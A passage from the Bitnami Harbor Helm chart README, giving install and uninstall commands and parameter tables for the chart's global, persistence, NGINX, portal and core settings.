- Uses new Helm chart labels formatting.
- Uses Bitnami container images:
- non-root by default
- published for debian-10 and ol-7
- This chart support the Harbor optional components Chartmuseum, Clair and Notary integrations.
## Prerequisites
- Kubernetes 1.19+
- Helm 3.2.0+
- PV provisioner support in the underlying infrastructure
- ReadWriteMany volumes for deployment scaling
## Installing the Chart
Install the Harbor helm chart with a release name `my-release`:
```bash
helm repo add bitnami https://charts.bitnami.com/bitnami
helm install my-release bitnami/harbor
```
## Uninstalling the Chart
To uninstall/delete the `my-release` deployment:
```bash
helm delete --purge my-release
```
Additionally, if `persistence.resourcePolicy` is set to `keep`, you should manually delete the PVCs.
## Parameters
### Global parameters
| Name | Description | Value |
| ------------------------- | ----------------------------------------------- | ----- |
| `global.imageRegistry` | Global Docker image registry | `""` |
| `global.imagePullSecrets` | Global Docker registry secret names as an array | `[]` |
| `global.storageClass` | Global StorageClass for Persistent Volume(s) | `""` |
### Common Parameters
| Name | Description | Value |
| ------------------------ | -------------------------------------------------------------------------------------------- | --------------- |
| `nameOverride` | String to partially override common.names.fullname template (will maintain the release name) | `""` |
| `fullnameOverride` | String to fully override common.names.fullname template with a string | `""` |
| `kubeVersion` | Force target Kubernetes version (using Helm capabilities if not set) | `""` |
| `clusterDomain` | Kubernetes Cluster Domain | `cluster.local` |
| `commonAnnotations` | Annotations to add to all deployed objects | `{}` |
| `commonLabels` | Labels to add to all deployed objects | `{}` |
| `extraDeploy` | Array of extra objects to deploy with the release (evaluated as a template). | `[]` |
| `diagnosticMode.enabled` | Enable diagnostic mode (all probes will be disabled and the command will be overridden) | `false` |
| `diagnosticMode.command` | Command to override all containers in the the deployment(s)/statefulset(s) | `["sleep"]` |
| `diagnosticMode.args` | Args to override all containers in the the deployment(s)/statefulset(s) | `["infinity"]` |
### Harbor common parameters
| Name | Description | Value |
| ---------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------- |
| `adminPassword` | The initial password of Harbor admin. Change it from portal after launching Harbor | `""` |
| `externalURL` | The external URL for Harbor Core service | `https://core.harbor.domain` |
| `proxy.httpProxy` | The URL of the HTTP proxy server | `""` |
| `proxy.httpsProxy` | The URL of the HTTPS proxy server | `""` |
| `proxy.noProxy` | The URLs that the proxy settings not apply to | `127.0.0.1,localhost,.local,.internal` |
| `proxy.components` | The component list that the proxy settings apply to | `["core","jobservice","clair","trivy"]` |
| `logLevel` | The log level used for Harbor services. Allowed values are [ fatal \| error \| warn \| info \| debug \| trace ] | `debug` |
| `internalTLS.enabled` | Use TLS in all the supported containers: chartmuseum, clair, core, jobservice, portal, registry and trivy | `false` |
| `internalTLS.caBundleSecret` | Name of an existing secret with a custom CA that will be injected into the trust store for chartmuseum, clair, core, jobservice, registry, trivy components | `""` |
| `ipFamily.ipv6.enabled` | Enable listening on IPv6 ([::]) for NGINX-based components (NGINX,portal) | `true` |
| `ipFamily.ipv4.enabled` | Enable listening on IPv4 for NGINX-based components (NGINX,portal) | `true` |
### Traffic Exposure Parameters
| Name | Description | Value |
| ---------------------------------- | -------------------------------------------------------------------------------------------------------------------------------- | ------------------------ |
| `exposureType` | The way to expose Harbor. Allowed values are [ ingress \| proxy ] | `proxy` |
| `service.type` | NGINX proxy service type | `LoadBalancer` |
| `service.ports.http` | NGINX proxy service HTTP port | `80` |
| `service.ports.https` | NGINX proxy service HTTPS port | `443` |
| `service.ports.notary` | Notary service port | `4443` |
| `service.nodePorts.http` | Node port for HTTP | `""` |
| `service.nodePorts.https` | Node port for HTTPS | `""` |
| `service.nodePorts.notary` | Node port for Notary | `""` |
| `service.sessionAffinity` | Control where client requests go, to the same pod or round-robin | `None` |
| `service.clusterIP` | NGINX proxy service Cluster IP | `""` |
| `service.loadBalancerIP` | NGINX proxy service Load Balancer IP | `""` |
| `service.loadBalancerSourceRanges` | NGINX proxy service Load Balancer sources | `[]` |
| `service.externalTrafficPolicy` | NGINX proxy service external traffic policy | `Cluster` |
| `service.annotations` | Additional custom annotations for NGINX proxy service | `{}` |
| `service.extraPorts` | Extra port to expose on NGINX proxy service | `[]` |
| `ingress.core.ingressClassName` | IngressClass that will be be used to implement the Ingress (Kubernetes 1.18+) | `""` |
| `ingress.core.pathType` | Ingress path type | `ImplementationSpecific` |
| `ingress.core.apiVersion` | Force Ingress API version (automatically detected if not set) | `""` |
| `ingress.core.controller` | The ingress controller type. Currently supports `default`, `gce` and `ncp` | `default` |
| `ingress.core.hostname` | Default host for the ingress record | `core.harbor.domain` |
| `ingress.core.annotations` | Additional annotations for the Ingress resource. To enable certificate autogeneration, place here your cert-manager annotations. | `{}` |
| `ingress.core.tls` | Enable TLS configuration for the host defined at `ingress.core.hostname` parameter | `false` |
| `ingress.core.selfSigned` | Create a TLS secret for this ingress record using self-signed certificates generated by Helm | `false` |
| `ingress.core.extraHosts` | An array with additional hostname(s) to be covered with the ingress record | `[]` |
| `ingress.core.extraPaths` | An array with additional arbitrary paths that may need to be added to the ingress under the main host | `[]` |
| `ingress.core.extraTls` | TLS configuration for additional hostname(s) to be covered with this ingress record | `[]` |
| `ingress.core.secrets` | Custom TLS certificates as secrets | `[]` |
| `ingress.notary.ingressClassName` | IngressClass that will be be used to implement the Ingress (Kubernetes 1.18+) | `""` |
| `ingress.notary.pathType` | Ingress path type | `ImplementationSpecific` |
| `ingress.notary.apiVersion` | Force Ingress API version (automatically detected if not set) | `""` |
| `ingress.notary.controller` | The ingress controller type. Currently supports `default`, `gce` and `ncp` | `default` |
| `ingress.notary.hostname` | Default host for the ingress record | `notary.harbor.domain` |
| `ingress.notary.annotations` | Additional annotations for the Ingress resource. To enable certificate autogeneration, place here your cert-manager annotations. | `{}` |
| `ingress.notary.tls` | Enable TLS configuration for the host defined at `ingress.hostname` parameter | `false` |
| `ingress.notary.selfSigned` | Create a TLS secret for this ingress record using self-signed certificates generated by Helm | `false` |
| `ingress.notary.extraHosts` | An array with additional hostname(s) to be covered with the ingress record | `[]` |
| `ingress.notary.extraPaths` | An array with additional arbitrary paths that may need to be added to the ingress under the main host | `[]` |
| `ingress.notary.extraTls` | TLS configuration for additional hostname(s) to be covered with this ingress record | `[]` |
| `ingress.notary.secrets` | Custom TLS certificates as secrets | `[]` |
### Persistence Parameters
| Name | Description | Value |
| ------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------- |
| `persistence.enabled` | Enable the data persistence or not | `true` |
| `persistence.resourcePolicy` | Setting it to `keep` to avoid removing PVCs during a helm delete operation. Leaving it empty will delete PVCs after the chart deleted | `keep` |
| `persistence.persistentVolumeClaim.registry.existingClaim` | Name of an existing PVC to use | `""` |
| `persistence.persistentVolumeClaim.registry.storageClass` | PVC Storage Class for Harbor Registry data volume | `""` |
| `persistence.persistentVolumeClaim.registry.subPath` | The sub path used in the volume | `""` |
| `persistence.persistentVolumeClaim.registry.accessModes` | The access mode of the volume | `["ReadWriteOnce"]` |
| `persistence.persistentVolumeClaim.registry.size` | The size of the volume | `5Gi` |
| `persistence.persistentVolumeClaim.registry.annotations` | Annotations for the PVC | `{}` |
| `persistence.persistentVolumeClaim.registry.selector` | Selector to match an existing Persistent Volume | `{}` |
| `persistence.persistentVolumeClaim.jobservice.existingClaim` | Name of an existing PVC to use | `""` |
| `persistence.persistentVolumeClaim.jobservice.storageClass` | PVC Storage Class for Harbor Jobservice data volume | `""` |
| `persistence.persistentVolumeClaim.jobservice.subPath` | The sub path used in the volume | `""` |
| `persistence.persistentVolumeClaim.jobservice.accessModes` | The access mode of the volume | `["ReadWriteOnce"]` |
| `persistence.persistentVolumeClaim.jobservice.size` | The size of the volume | `1Gi` |
| `persistence.persistentVolumeClaim.jobservice.annotations` | Annotations for the PVC | `{}` |
| `persistence.persistentVolumeClaim.jobservice.selector` | Selector to match an existing Persistent Volume | `{}` |
| `persistence.persistentVolumeClaim.chartmuseum.existingClaim` | Name of an existing PVC to use | `""` |
| `persistence.persistentVolumeClaim.chartmuseum.storageClass` | PVC Storage Class for Chartmuseum data volume | `""` |
| `persistence.persistentVolumeClaim.chartmuseum.subPath` | The sub path used in the volume | `""` |
| `persistence.persistentVolumeClaim.chartmuseum.accessModes` | The access mode of the volume | `["ReadWriteOnce"]` |
| `persistence.persistentVolumeClaim.chartmuseum.size` | The size of the volume | `5Gi` |
| `persistence.persistentVolumeClaim.chartmuseum.annotations` | Annotations for the PVC | `{}` |
| `persistence.persistentVolumeClaim.chartmuseum.selector` | Selector to match an existing Persistent Volume | `{}` |
| `persistence.persistentVolumeClaim.trivy.storageClass` | PVC Storage Class for Trivy data volume | `""` |
| `persistence.persistentVolumeClaim.trivy.accessModes` | The access mode of the volume | `["ReadWriteOnce"]` |
| `persistence.persistentVolumeClaim.trivy.size` | The size of the volume | `5Gi` |
| `persistence.persistentVolumeClaim.trivy.annotations` | Annotations for the PVC | `{}` |
| `persistence.persistentVolumeClaim.trivy.selector` | Selector to match an existing Persistent Volume | `{}` |
| `persistence.imageChartStorage.caBundleSecret` | Specify the `caBundleSecret` if the storage service uses a self-signed certificate. The secret must contain keys named `ca.crt` which will be injected into the trust store of registry's and chartmuseum's containers. | `""` |
| `persistence.imageChartStorage.disableredirect` | The configuration for managing redirects from content backends. For backends which do not supported it (such as using MinIO® for `s3` storage type), please set it to `true` to disable redirects. Refer to the [guide](https://github.com/docker/distribution/blob/master/docs/configuration.md#redirect) for more information about the detail | `false` |
| `persistence.imageChartStorage.type` | The type of storage for images and charts: `filesystem`, `azure`, `gcs`, `s3`, `swift` or `oss`. The type must be `filesystem` if you want to use persistent volumes for registry and chartmuseum. Refer to the [guide](https://github.com/docker/distribution/blob/master/docs/configuration.md#storage) for more information about the detail | `filesystem` |
| `persistence.imageChartStorage.filesystem.rootdirectory` | Filesystem storage type setting: Storage root directory | `/storage` |
| `persistence.imageChartStorage.filesystem.maxthreads` | Filesystem storage type setting: Maximum threads directory | `""` |
| `persistence.imageChartStorage.azure.accountname` | Azure storage type setting: Name of the Azure account | `accountname` |
| `persistence.imageChartStorage.azure.accountkey` | Azure storage type setting: Key of the Azure account | `base64encodedaccountkey` |
| `persistence.imageChartStorage.azure.container` | Azure storage type setting: Container | `containername` |
| `persistence.imageChartStorage.azure.storagePrefix` | Azure storage type setting: Storage prefix | `/azure/harbor/charts` |
| `persistence.imageChartStorage.azure.realm` | Azure storage type setting: Realm of the Azure account | `""` |
| `persistence.imageChartStorage.gcs.bucket` | GCS storage type setting: Bucket name | `bucketname` |
| `persistence.imageChartStorage.gcs.encodedkey` | GCS storage type setting: Base64 encoded key | `base64-encoded-json-key-file` |
| `persistence.imageChartStorage.gcs.rootdirectory` | GCS storage type setting: Root directory name | `""` |
| `persistence.imageChartStorage.gcs.chunksize` | GCS storage type setting: Chunk size name | `""` |
| `persistence.imageChartStorage.s3.region` | S3 storage type setting: Region | `us-west-1` |
| `persistence.imageChartStorage.s3.bucket` | S3 storage type setting: Bucket name | `bucketname` |
| `persistence.imageChartStorage.s3.accesskey` | S3 storage type setting: Access key name | `""` |
| `persistence.imageChartStorage.s3.secretkey` | S3 storage type setting: Secret Key name | `""` |
| `persistence.imageChartStorage.s3.regionendpoint` | S3 storage type setting: Region Endpoint | `""` |
| `persistence.imageChartStorage.s3.encrypt` | S3 storage type setting: Encrypt | `""` |
| `persistence.imageChartStorage.s3.keyid` | S3 storage type setting: Key ID | `""` |
| `persistence.imageChartStorage.s3.secure` | S3 storage type setting: Secure | `""` |
| `persistence.imageChartStorage.s3.skipverify` | S3 storage type setting: TLS skip verification | `""` |
| `persistence.imageChartStorage.s3.v4auth` | S3 storage type setting: V4 authorization | `""` |
| `persistence.imageChartStorage.s3.chunksize` | S3 storage type setting: V4 authorization | `""` |
| `persistence.imageChartStorage.s3.rootdirectory` | S3 storage type setting: Root directory name | `""` |
| `persistence.imageChartStorage.s3.storageClass` | S3 storage type setting: Storage class | `""` |
| `persistence.imageChartStorage.s3.sse` | S3 storage type setting: SSE name | `""` |
| `persistence.imageChartStorage.swift.authurl` | Swift storage type setting: Authentication url | `https://storage.myprovider.com/v3/auth` |
| `persistence.imageChartStorage.swift.username` | Swift storage type setting: Authentication url | `""` |
| `persistence.imageChartStorage.swift.password` | Swift storage type setting: Password | `""` |
| `persistence.imageChartStorage.swift.container` | Swift storage type setting: Container | `""` |
| `persistence.imageChartStorage.swift.region` | Swift storage type setting: Region | `""` |
| `persistence.imageChartStorage.swift.tenant` | Swift storage type setting: Tenant | `""` |
| `persistence.imageChartStorage.swift.tenantid` | Swift storage type setting: TenantID | `""` |
| `persistence.imageChartStorage.swift.domain` | Swift storage type setting: Domain | `""` |
| `persistence.imageChartStorage.swift.domainid` | Swift storage type setting: DomainID | `""` |
| `persistence.imageChartStorage.swift.trustid` | Swift storage type setting: TrustID | `""` |
| `persistence.imageChartStorage.swift.insecureskipverify` | Swift storage type setting: Verification | `""` |
| `persistence.imageChartStorage.swift.chunksize` | Swift storage type setting: Chunk | `""` |
| `persistence.imageChartStorage.swift.prefix` | Swift storage type setting: Prefix | `""` |
| `persistence.imageChartStorage.swift.secretkey` | Swift storage type setting: Secre Key | `""` |
| `persistence.imageChartStorage.swift.accesskey` | Swift storage type setting: Access Key | `""` |
| `persistence.imageChartStorage.swift.authversion` | Swift storage type setting: Auth | `""` |
| `persistence.imageChartStorage.swift.endpointtype` | Swift storage type setting: Endpoint | `""` |
| `persistence.imageChartStorage.swift.tempurlcontainerkey` | Swift storage type setting: Temp URL container key | `""` |
| `persistence.imageChartStorage.swift.tempurlmethods` | Swift storage type setting: Temp URL methods | `""` |
| `persistence.imageChartStorage.oss.accesskeyid` | OSS storage type setting: Access key ID | `""` |
| `persistence.imageChartStorage.oss.accesskeysecret` | OSS storage type setting: Access key secret name containing the token | `""` |
| `persistence.imageChartStorage.oss.region` | OSS storage type setting: Region name | `""` |
| `persistence.imageChartStorage.oss.bucket` | OSS storage type setting: Bucket name | `""` |
| `persistence.imageChartStorage.oss.endpoint` | OSS storage type setting: Endpoint | `""` |
| `persistence.imageChartStorage.oss.internal` | OSS storage type setting: Internal | `""` |
| `persistence.imageChartStorage.oss.encrypt` | OSS storage type setting: Encrypt | `""` |
| `persistence.imageChartStorage.oss.secure` | OSS storage type setting: Secure | `""` |
| `persistence.imageChartStorage.oss.chunksize` | OSS storage type setting: Chunk | `""` |
| `persistence.imageChartStorage.oss.rootdirectory` | OSS storage type setting: Directory | `""` |
| `persistence.imageChartStorage.oss.secretkey` | OSS storage type setting: Secret key | `""` |
### Volume Permissions parameters
| Name | Description | Value |
| ------------------------------------------------------ | ------------------------------------------------------------------------------- | ----------------------- |
| `volumePermissions.enabled` | Enable init container that changes the owner and group of the persistent volume | `false` |
| `volumePermissions.image.registry` | Init container volume-permissions image registry | `docker.io` |
| `volumePermissions.image.repository` | Init container volume-permissions image repository | `bitnami/bitnami-shell` |
| `volumePermissions.image.tag` | Init container volume-permissions image tag (immutable tags are recommended) | `10-debian-10-r370` |
| `volumePermissions.image.pullPolicy` | Init container volume-permissions image pull policy | `IfNotPresent` |
| `volumePermissions.image.pullSecrets` | Init container volume-permissions image pull secrets | `[]` |
| `volumePermissions.resources.limits` | Init container volume-permissions resource limits | `{}` |
| `volumePermissions.resources.requests` | Init container volume-permissions resource requests | `{}` |
| `volumePermissions.containerSecurityContext.enabled` | Enable init container Security Context | `true` |
| `volumePermissions.containerSecurityContext.runAsUser` | User ID for the init container | `0` |
### NGINX Parameters
| Name | Description | Value |
| --------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------ | ---------------------- |
| `nginx.image.registry` | NGINX image registry | `docker.io` |
| `nginx.image.repository` | NGINX image repository | `bitnami/nginx` |
| `nginx.image.tag` | NGINX image tag (immutable tags are recommended) | `1.21.6-debian-10-r50` |
| `nginx.image.pullPolicy` | NGINX image pull policy | `IfNotPresent` |
| `nginx.image.pullSecrets` | NGINX image pull secrets | `[]` |
| `nginx.image.debug` | Enable NGINX image debug mode | `false` |
| `nginx.tls.enabled` | Enable TLS termination | `true` |
| `nginx.tls.existingSecret` | Existing secret name containing your own TLS certificates. | `""` |
| `nginx.tls.commonName` | The common name used to generate the self-signed TLS certificates | `core.harbor.domain` |
| `nginx.behindReverseProxy` | If NGINX is behind another reverse proxy, set to true | `false` |
| `nginx.command` | Override default container command (useful when using custom images) | `[]` |
| `nginx.args` | Override default container args (useful when using custom images) | `[]` |
| `nginx.extraEnvVars` | Array with extra environment variables to add NGINX pods | `[]` |
| `nginx.extraEnvVarsCM` | ConfigMap containing extra environment variables for NGINX pods | `""` |
| `nginx.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for NGINX pods | `""` |
| `nginx.containerPorts.http` | NGINX HTTP container port | `8080` |
| `nginx.containerPorts.https` | NGINX HTTPS container port | `8443` |
| `nginx.containerPorts.notary` | NGINX container port where Notary svc is exposed | `4443` |
| `nginx.replicaCount` | Number of NGINX replicas | `1` |
| `nginx.livenessProbe.enabled` | Enable livenessProbe on NGINX containers | `true` |
| `nginx.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `nginx.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `nginx.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `nginx.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `nginx.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `nginx.readinessProbe.enabled` | Enable readinessProbe on NGINX containers | `true` |
| `nginx.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `nginx.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `nginx.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `nginx.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `nginx.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `nginx.startupProbe.enabled` | Enable startupProbe on NGINX containers | `false` |
| `nginx.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `10` |
| `nginx.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `nginx.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `nginx.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `nginx.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `nginx.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `nginx.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `nginx.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `nginx.resources.limits` | The resources limits for the NGINX containers | `{}` |
| `nginx.resources.requests` | The requested resources for the NGINX containers | `{}` |
| `nginx.podSecurityContext.enabled` | Enabled NGINX pods' Security Context | `true` |
| `nginx.podSecurityContext.fsGroup` | Set NGINX pod's Security Context fsGroup | `1001` |
| `nginx.containerSecurityContext.enabled` | Enabled NGINX containers' Security Context | `true` |
| `nginx.containerSecurityContext.runAsUser` | Set NGINX containers' Security Context runAsUser | `1001` |
| `nginx.containerSecurityContext.runAsNonRoot` | Set NGINX containers' Security Context runAsNonRoot | `true` |
| `nginx.updateStrategy.type` | NGINX deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `nginx.updateStrategy.rollingUpdate` | NGINX deployment rolling update configuration parameters | `{}` |
| `nginx.lifecycleHooks` | LifecycleHook for the NGINX container(s) to automate configuration before or after startup | `{}` |
| `nginx.hostAliases` | NGINX pods host aliases | `[]` |
| `nginx.podLabels` | Add additional labels to the NGINX pods (evaluated as a template) | `{}` |
| `nginx.podAnnotations` | Annotations to add to the NGINX pods (evaluated as a template) | `{}` |
| `nginx.podAffinityPreset` | NGINX Pod affinity preset. Ignored if `affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `nginx.podAntiAffinityPreset` | NGINX Pod anti-affinity preset. Ignored if `affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `nginx.nodeAffinityPreset.type` | NGINX Node affinity preset type. Ignored if `affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `nginx.nodeAffinityPreset.key` | NGINX Node label key to match Ignored if `affinity` is set. | `""` |
| `nginx.nodeAffinityPreset.values` | NGINX Node label values to match. Ignored if `affinity` is set. | `[]` |
| `nginx.affinity` | NGINX Affinity for pod assignment | `{}` |
| `nginx.nodeSelector` | NGINX Node labels for pod assignment | `{}` |
| `nginx.tolerations` | NGINX Tolerations for pod assignment | `[]` |
| `nginx.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `nginx.priorityClassName` | Priority Class Name | `""` |
| `nginx.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `nginx.sidecars` | Add additional sidecar containers to the NGINX pods | `[]` |
| `nginx.initContainers` | Add additional init containers to the NGINX pods | `[]` |
| `nginx.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the NGINX pods | `[]` |
| `nginx.extraVolumes` | Optionally specify extra list of additional volumes for the NGINX pods | `[]` |
### Harbor Portal Parameters
| Name | Description | Value |
| ---------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------ | ----------------------- |
| `portal.image.registry` | Harbor Portal image registry | `docker.io` |
| `portal.image.repository` | Harbor Portal image repository | `bitnami/harbor-portal` |
| `portal.image.tag` | Harbor Portal image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `portal.image.pullPolicy` | Harbor Portal image pull policy | `IfNotPresent` |
| `portal.image.pullSecrets` | Harbor Portal image pull secrets | `[]` |
| `portal.image.debug` | Enable Harbor Portal image debug mode | `false` |
| `portal.tls.existingSecret` | Name of an existing secret with the certificates for internal TLS access | `""` |
| `portal.command` | Override default container command (useful when using custom images) | `[]` |
| `portal.args` | Override default container args (useful when using custom images) | `[]` |
| `portal.extraEnvVars` | Array with extra environment variables to add Harbor Portal pods | `[]` |
| `portal.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Portal pods | `""` |
| `portal.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Portal pods | `""` |
| `portal.containerPorts.http` | Harbor Portal HTTP container port | `8080` |
| `portal.containerPorts.https` | Harbor Portal HTTPS container port | `8443` |
| `portal.replicaCount` | Number of Harbor Portal replicas | `1` |
| `portal.livenessProbe.enabled` | Enable livenessProbe on Harbor Portal containers | `true` |
| `portal.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `portal.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `portal.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `portal.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `portal.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `portal.readinessProbe.enabled` | Enable readinessProbe on Harbor Portal containers | `true` |
| `portal.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `portal.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `portal.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `portal.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `portal.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `portal.startupProbe.enabled` | Enable startupProbe on Harbor Portal containers | `false` |
| `portal.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `portal.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `portal.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `portal.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `portal.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `portal.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `portal.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `portal.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `portal.resources.limits` | The resources limits for the Harbor Portal containers | `{}` |
| `portal.resources.requests` | The requested resources for the Harbor Portal containers | `{}` |
| `portal.podSecurityContext.enabled` | Enabled Harbor Portal pods' Security Context | `true` |
| `portal.podSecurityContext.fsGroup` | Set Harbor Portal pod's Security Context fsGroup | `1001` |
| `portal.containerSecurityContext.enabled` | Enabled Harbor Portal containers' Security Context | `true` |
| `portal.containerSecurityContext.runAsUser` | Set Harbor Portal containers' Security Context runAsUser | `1001` |
| `portal.containerSecurityContext.runAsNonRoot` | Set Harbor Portal containers' Security Context runAsNonRoot | `true` |
| `portal.updateStrategy.type` | Harbor Portal deployment strategy type - only really applicable for deployments with RWO PVs attached | `RollingUpdate` |
| `portal.updateStrategy.rollingUpdate` | Harbor Portal deployment rolling update configuration parameters | `{}` |
| `portal.lifecycleHooks` | LifecycleHook for the Harbor Portal container(s) to automate configuration before or after startup | `{}` |
| `portal.hostAliases` | Harbor Portal pods host aliases | `[]` |
| `portal.podLabels` | Add additional labels to the Harbor Portal pods (evaluated as a template) | `{}` |
| `portal.podAnnotations` | Annotations to add to the Harbor Portal pods (evaluated as a template) | `{}` |
| `portal.podAffinityPreset` | Harbor Portal Pod affinity preset. Ignored if `portal.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `portal.podAntiAffinityPreset` | Harbor Portal Pod anti-affinity preset. Ignored if `portal.affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `portal.nodeAffinityPreset.type` | Harbor Portal Node affinity preset type. Ignored if `portal.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `portal.nodeAffinityPreset.key` | Harbor Portal Node label key to match Ignored if `portal.affinity` is set. | `""` |
| `portal.nodeAffinityPreset.values` | Harbor Portal Node label values to match. Ignored if `portal.affinity` is set. | `[]` |
| `portal.affinity` | Harbor Portal Affinity for pod assignment | `{}` |
| `portal.nodeSelector` | Harbor Portal Node labels for pod assignment | `{}` |
| `portal.tolerations` | Harbor Portal Tolerations for pod assignment | `[]` |
| `portal.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `portal.priorityClassName` | Priority Class Name | `""` |
| `portal.schedulerName` | Use an alternate scheduler, e.g. "stork". | `""` |
| `portal.sidecars` | Add additional sidecar containers to the Harbor Portal pods | `[]` |
| `portal.initContainers` | Add additional init containers to the Harbor Portal pods | `[]` |
| `portal.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Harbor Portal pods | `[]` |
| `portal.extraVolumes` | Optionally specify extra list of additional volumes for the Harbor Portal pods | `[]` |
| `portal.automountServiceAccountToken` | Automount service account token | `false` |
| `portal.service.ports.http` | Harbor Portal HTTP service port | `80` |
| `portal.service.ports.https` | Harbor Portal HTTPS service port | `443` |
### Harbor Core Parameters
| Name | Description | Value |
| -------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------- |
| `core.image.registry` | Harbor Core image registry | `docker.io` |
| `core.image.repository` | Harbor Core image repository | `bitnami/harbor-core` |
| `core.image.tag` | Harbor Core image tag (immutable tags are recommended) | `2.4.2-debian-10-r2` |
| `core.image.pullPolicy` | Harbor Core image pull policy | `IfNotPresent` |
| `core.image.pullSecrets` | Harbor Core image pull secrets | `[]` |
| `core.image.debug` | Enable Harbor Core image debug mode | `false` |
| `core.uaaSecret` | If using external UAA auth which has a self signed cert, you can provide a pre-created secret containing it under the key `ca.crt`. | `""` |
| `core.secretKey` | The key used for encryption. Must be a string of 16 chars | `""` |
| `core.secret` | Secret used when the core server communicates with other components. If a secret key is not specified, Helm will generate one. Must be a string of 16 chars. | `""` |
| `core.secretName` | Fill the name of a kubernetes secret if you want to use your own TLS certificate and private key for token encryption/decryption. The secret must contain two keys named: `tls.crt` - the certificate and `tls.key` - the private key. The default key pair will be used if it isn't set | `""` |
| `core.csrfKey` | The CSRF key. Will be generated automatically if it isn't specified | `""` |
| `core.tls.existingSecret` | Name of an existing secret with the certificates for internal TLS access | `""` |
| `core.command` | Override default container command (useful when using custom images) | `[]` |
| `core.args` | Override default container args (useful when using custom images) | `[]` |
| `core.extraEnvVars` | Array with extra environment variables to add Harbor Core pods | `[]` |
| `core.extraEnvVarsCM` | ConfigMap containing extra environment variables for Harbor Core pods | `""` |
| `core.extraEnvVarsSecret` | Secret containing extra environment variables (in case of sensitive data) for Harbor Core pods | `""` |
| `core.containerPorts.http` | Harbor Core HTTP container port | `8080` |
| `core.containerPorts.https` | Harbor Core HTTPS container port | `8443` |
| `core.containerPorts.metrics` | Harbor Core metrics container port | `8001` |
| `core.replicaCount` | Number of Harbor Core replicas | `1` |
| `core.livenessProbe.enabled` | Enable livenessProbe on Harbor Core containers | `true` |
| `core.livenessProbe.initialDelaySeconds` | Initial delay seconds for livenessProbe | `20` |
| `core.livenessProbe.periodSeconds` | Period seconds for livenessProbe | `10` |
| `core.livenessProbe.timeoutSeconds` | Timeout seconds for livenessProbe | `5` |
| `core.livenessProbe.failureThreshold` | Failure threshold for livenessProbe | `6` |
| `core.livenessProbe.successThreshold` | Success threshold for livenessProbe | `1` |
| `core.readinessProbe.enabled` | Enable readinessProbe on Harbor Core containers | `true` |
| `core.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `core.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `core.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `core.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `core.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `core.startupProbe.enabled` | Enable startupProbe on Harbor Core containers | `false` |
